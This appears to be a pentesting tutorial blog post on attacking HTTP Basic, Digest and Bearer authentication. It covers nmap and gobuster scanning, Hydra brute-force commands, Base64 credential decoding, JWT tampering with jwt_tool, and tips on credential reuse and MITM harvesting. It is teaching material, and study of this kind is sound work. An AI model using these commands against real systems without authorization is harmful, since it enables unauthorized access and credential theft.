Leave a Comment / Exploit-Services, Uncategorized / By

Cracking HTTP Authentication:

When people think of authentication, they think login pages. But some services tuck away a gatekeeper at the protocol level—HTTP Authentication. Whether it’s Basic, Digest, or Bearer, understanding how these mechanisms work helps pentesters bypass them, crack them, or abuse them.

Here’s everything you need, step-by-step.

1. What is HTTP Authentication?

HTTP Authentication is a way of protecting resources using headers rather than web forms.

Types of HTTP Authentication:

  • Basic Auth:
    • Sends username:password Base64-encoded in headers.
    • Easily intercepted if not over HTTPS.
  • Digest Auth:
    • Hashes credentials before sending (MD5).
    • Still crackable offline with tools.
  • Bearer Tokens / API Keys:
    • Uses a token (usually in Authorization header) to access resources.
    • Can be stolen or reused.

2. Scanning for HTTP Authentication

Nmap

nmap -p 80,443 --script http-auth <target>

This reveals:

  • Type of authentication (Basic, Digest, NTLM, etc.)
  • Realm (auth scope)
  • Whether credentials are required

Dirbuster/Gobuster

gobuster dir -u http://<target> -w /usr/share/wordlists/dirb/common.txt -k
  • Helps find hidden endpoints that may be auth-protected.

3. Enumeration of HTTP Authentication

Using a Browser

  • Visiting the endpoint shows a popup asking for credentials.
  • Inspect the WWW-Authenticate response header to identify the method:
    • Basic realm="Secure Area"
    • Digest realm="API Access"

Using curl

curl -I http://<target>

Check for:

HTTP/1.1 401 Unauthorized
WWW-Authenticate: Basic realm="Restricted Area"

Using Burp Suite

  • Visit the endpoint
  • Intercept the response
  • Check the headers and test brute-forcing via Burp Intruder

4. Exploiting HTTP Authentication

Brute Forcing Basic or Digest Auth

🛠 Using Hydra (Basic Auth)

hydra -L users.txt -P passwords.txt <target> http-get /protected_page

🛠 Using Hydra (Digest Auth)

hydra -L users.txt -P passwords.txt <target> http-get /protected_page digest

Using Curl to Access with Known Creds

curl -u admin:admin http://<target>/protected

Base64 Decode (Basic Auth)

If you see something like this in a request:

Authorization: Basic YWRtaW46YWRtaW4=

Decode it:

echo YWRtaW46YWRtaW4= | base64 -d
# admin:admin

Token Stealing (Bearer)

If you capture this header:

Authorization: Bearer eyJhbGciOi...

Try reusing it directly or JWT tampering:

  • Decode using jwt.io or jwt-tool
  • Modify alg or payload
  • Re-sign if secret is weak
jwt_tool <token> -C -d

5. Post-Exploitation of HTTP Auth

Once you’re authenticated…

Sensitive Data Access

  • Access hidden endpoints
  • Download backups or configuration files

API Abuse

  • Use Bearer tokens to call unauthorized endpoints
  • Bypass role restrictions if token isn’t validated properly

Credential Reuse

  • Try credentials on:
    • SSH
    • SMB
    • RDP
    • Web login forms

Credential Harvesting

  • If you can MITM traffic or read proxy logs, you might recover plaintext Basic credentials

TryHackMe Rooms to Practice HTTP Auth Attacks

Final Thoughts

HTTP Auth may seem like a roadblock, but it’s often just a speed bump. Whether you’re decoding weak Base64 credentials, brute-forcing your way in, or replaying bearer tokens, knowing how these headers work gives you a real edge.

Related Posts

Leave a Comment

Your email address will not be published. Required fields are marked *

Scroll to Top